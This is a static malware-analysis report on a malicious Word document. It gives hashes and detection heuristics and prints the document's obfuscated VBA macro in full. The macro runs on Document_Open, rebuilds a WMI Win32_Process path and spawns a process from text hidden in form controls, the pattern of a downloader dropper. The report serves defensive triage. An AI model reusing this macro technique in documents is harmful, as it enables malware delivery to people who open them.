Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7773da7405e3481d…

MALICIOUS

Office (OLE)

183.3 KB Created: 2019-12-20 12:27:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: d20ab523a18f055c737ab3ebdfb418e4 SHA-1: 7ca7549df388c3bc05362b2df6aad8d8c4e36678 SHA-256: 7773da7405e3481d19a4487a9a6a231039f8b5e5d924ebcc95b02a5b5bf5c355
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Generic-7469790-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7469790-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Cnnxftaudijtf = GetObject(Rpmdfmcv)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7456 bytes
SHA-256: 510b9fb2df740ca55054380eece8ab243b2f32c2b7ef22a42e4ab34c92a53a2e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
190 of 302 identifiers look randomly generated (e.g. 'Pnrpeqoknclfz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Eehltfkxwg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Deihnpxkvtdue, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Zzetriydl = 234 + 423
   Do While Syntoazphs = 1
      Anccvwtv = 3 * Dhhowgdrgs
      Txscrbspdml = ("Quibusdam soluta.")
      For Gpfdgruzh = Laesmqmvn To Eksfrcxhrwkj
         Xnzbvoldmrrx = ("Emmett")
         Napjsmkv = 223
      Next
      Zrczcjaq = Ocnurxib
Loop
Foxnzyhueflj
   Xcfiggdyau = 234 + 423
   Do While Xhpqckvi = 1
      Xwhrnsulm = 3 * Whjdossav
      Fcihmzzn = ("Henry")
      For Gseiaptkdohl = Zfnnrchk To Qejggvmyomqpe
         Dzqrwtuhhhg = ("Stella")
         Vhlvxirvgm = 223
      Next
      Bjwjkkbsz = Rtycwxbz
Loop
End Sub

Attribute VB_Name = "Ohxgbrilhx"
Attribute VB_Base = "0{1DDA49EA-E0D8-4BFA-BB2F-7D387BA46C00}{83E60713-1A19-44BE-A8C0-8D646D635586}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Dndcbirsevqkp"
Function Xuuxbxyddksr()
   Xzkikmkkawzqg = 234 + 423
   Do While Sxalnqkyzwkkf = 1
      Bybmwtozzgtx = 3 * Djyqrtqria
      Allzbfsgvap = ("Nisi.")
      For Fexaeusuovn = Ozckqahjscnz To Fjocuealosq
         Msmpyohqt = ("Wendy")
         Komgnbkbzf = 223
      Next
      Attgtdkjum = Qgnolxymedrg
Loop
Irulcyqkihc = Eehltfkxwg.Deihnpxkvtdue
   Kiamvpznfhaxi = 234 + 423
   Do While Qjtcsrzdngxcz = 1
      Gwbeelshtsl = 3 * Hywxibwcb
      Ekemfynzm = ("Odit consequatur quia facilis.")
      For Eweakxca = Lsvpkztyf To Cwathgcue
         Pgtathqyabjx = ("Cameron")
         Iwvzubhgwcze = 223
      Next
      Rafgvscp = Gligkdszhb
Loop
Fbpmdeqbfmi = Irulcyqkihc + Ohxgbrilhx.Eifyggspoteqz + Ohxgbrilhx.Uyvcnxvrjqu + Ohxgbrilhx.Uvmyjiyvnrl
   Uvmvbbxybkkv = 234 + 423
   Do While Tzxyivsugpx = 1
      Pmzeyhelrsota = 3 * Kcfmvbcicibl
      Pxxrchlb = ("Ea aut dolorum incidunt aliquam quis.")
      For Nzebgjeiqy = Jlpxndxw To Elcvqcywiiwty
         Acsdsuaqlnmce = ("Debitis et.")
         Ekprutzkt = 223
      Next
      Uqbgpmsbnb = Ebeuqieatdad
Loop
Iqfvaqfrc = Fbpmdeqbfmi + Ohxgbrilhx.Qjhxhbtex + Ohxgbrilhx.Nosfhhwouzj.Tag
   Zuvtyrngvv = 234 + 423
   Do While Rdqzmzykzmdx = 1
      Ebojswaptpyy = 3 * Gljxbcjlzxiz
      Lmqymemm = ("Error sed qui repellendus veritatis ea.")
      For Dytckbanmd = Dgvflsbrbsc To Gzaliitu
         Djgbywunqwxi = ("Sit enim.")
         Htukakkv = 223
      Next
      Dbacevjtgmswe = Uhfmegyp
Loop
Xuuxbxyddksr = Btwdsehbglq + Iqfvaqfrc + Btwdsehbglq
   Vxftjzioj = 234 + 423
   Do While Qjvndqwxkmznc = 1
      Xcudfewp = 3 * Nfbcftuhfzj
      Rcqpuvvkc = ("Dolorum quasi qui.")
      For Cfugltutzv = Uvesffxgrj To Appbuagl
         Aayowmfpolbr = ("Porro.")
         Pcpffgrskrfw = 223
      Next
      Zzpercuetril = Vjbitvmr
Loop
End Function
Function Foxnzyhueflj()
   Pnrpeqoknclfz = 234 + 423
   Do While Mxqczuwld = 1
      Hcgohlem = 3 * Usguagyunaiw
      Wbixbtcoga = ("Quas a error aut voluptatem sunt voluptatibus quia magnam ut.")
      For Ezuabmhpsf = Ynyqpivka To Gcglcqgmgkoc
         Nzvpmtrs = ("Ab.")
         Nvlzyeyljhoyu = 223
      Next
      Zmsdxjlzq = Avncaobhx
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Sxlfaxujllvgc = 234 + 423
   Do While Exsvlpyg = 1
      Ljjjyramz = 3 * Bfkuwgahg
      Migpynajuq = ("Enim.")
      For Pnlanuvucnsds = Ojxznuzw To Jsmlqvrj
         Glfnmltjypdw = ("Accusantium beatae unde quo vitae totam velit.")
         Mawrecprjy = 223
      Next
      Iilsaukn = Djmcaqxl
Loop
Jbtqdshtfr = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Eehltfkxwg.Deihnpxkvtdue + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   Bdlfcbiqby = 234 + 423
   Do While Jdmcckyp = 1
      Eprfhwvdxguz = 3 * Rztbyaiveaclh
      Bkkcjywnwtmv = ("Non.")
      For Ogjjnldr = Jjikrdwprlw To Wlaulximel
         Tsctrojotsz = ("Totam tempore.")
         Wswxeleswn = 223
      Next
      Qrtnefynuy = Vzxmirdmkjpe
Loop
Rpmdfmcv = Join(Jbtqdshtfr, "")
   Fpvcdtytoj = 234 + 423
   Do While Ajpyjjivjedv = 1
      Hldzvswb = 3 * Dkodwlfmiezz
      Jmvqdblas = ("Quam.")
      For Mqpnzwzstv = Ezxyrmfchawp To Gxpkdsnrjuqyi
         Grkksqrfctnmz = ("Eveniet.")
         Taecpcdjsg = 223
      Next
      Pcitexcaime = Psnqpfnnx
Loop
Set Cnnxftaudijtf = GetObject(Rpmdfmcv)
   Nuwcvjdnxiyt = 234 + 423
   Do While Rjlevqzdpsq = 1
      Yfqfyzsdt = 3 * Tunqmsdgww
      Sjaqskedmzde = ("Saepe laborum aut a.")
      For Czuujysyk = Iqwpjzjz To Wyiztonztqiif
         Mbnbctyy = ("Quis et ut aut.")
         Tindaufyif = 223
      Next
      Vpjfzrkual = Wxvxhfxzup
Loop
Lztgmlgkjuoql = Rpmdfmcv + Ohxgbrilhx.Uxkbnfsocpewg.ControlTipText + Ohxgbrilhx.Qwhmkeushf.ControlTipText
   Rpqawzhnhswx = 234 + 423
   Do While Hnpqpquhmzlz = 1
      Fevqkblms = 3 * Plccgfvyml
      Korxkdrowbbhd = ("Sint est ducimus in ut molestias voluptates.")
      For Ntiuuoeze = Ftqbkujhl To Dajbmonjvzkz
         Eqbifomff = ("Suzanne")
         Yvrhywlduphlt = 223
      Next
      Luweuuhwgdh = Ngyvldosw
Loop
Chwivovuxgv = Lztgmlgkjuoql + Eehltfkxwg.Deihnpxkvtdue
   Qqqddtsvdqtj = 234 + 423
   Do While Iaxxoevcuabk = 1
      Bbcavsobcoj = 3 * Ddpdibkhetg
      Wovpctycubnto = ("Mollitia ex saepe deleniti aut porro quo dignissimos.")
      For Hyinhnrye = Jkjwivoxvzfm To Hpjcbkutdzg
         Ejfpqrikotxt = ("Cassandra")
         Qmgclvwzy = 223
      Next
      Dnypgjqwcjopj = Dgtvmjkfehxx
Loop
Set Foxnzyhueflj = GetObject(Chwivovuxgv)
   Ozxxswibrkz = 234 + 423
   Do While Mhfteymnvxlt = 1
      Tweybdspi = 3 * Wqqwtfkjfszig
      Idtblepro = ("Eum autem voluptatem iure et perferendis.")
      For Lxcbxyhuih = Bsbjxmuoyfv To Whmugybrhtn
         Vaamlymm = ("Shawna")
         Kvsfuqogb = 223
      Next
      Arvabjuyuy = Tqunmtxj
Loop
Foxnzyhueflj.XSize = False
   Ytqwtpubcvfwq = 234 + 423
   Do While Uzlezkjtzww = 1
      Pnjlyjrmpsksd = 3 * Nwkipyqxnbqmo
      Zwvxmpltxhk = ("Omnis.")
      For Gblvulgdm = Xyqwkhwcl To Nxgcibcmaexl
         Pvsdtnmirz = ("Autem consectetur dicta repellat quae qui velit sit voluptatem.")
         Pjqkipfnooprc = 223
      Next
      Anaanakv = Zslffggo
Loop
Foxnzyhueflj.YSize = False
   Cksuoytboincn = 234 + 423
   Do While Hvcbcjgqkvlo = 1
      Ujpmtgbt = 3 * Oyvizgcui
      Xyprowuhycjra = ("Natus quo qui impedit.")
      For Yqthqoewndoyq = Rggcxkzufkhl To Ehvoahma
         Ksccnaxdc = ("Quo.")
         Dkywoyvoxi = 223
      Next
      Sivskpwgrg = Ehxgfmdimtaw
Loop
Do While Cnnxftaudijtf.Create(KSNNSN & Xuuxbxyddksr, Jowqyjhqxb, Foxnzyhueflj, Esfksqplop)
Loop
   Qmzelfszfnc = 234 + 423
   Do While Vqntwmdgldm = 1
      Sgvmdshbxu = 3 * Hfckmwkko
      Vcdxhjfj = ("Dignissimos rem.")
      For Anmdsjkcnyvd = Hbvygbzvqcz To Vasrlxmhsphum
         Bdhsqoqfn = ("Omnis saepe.")
         Lvewjdjk = 223
      Next
      Vgkfzhol = Tbrumvhs
Loop
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.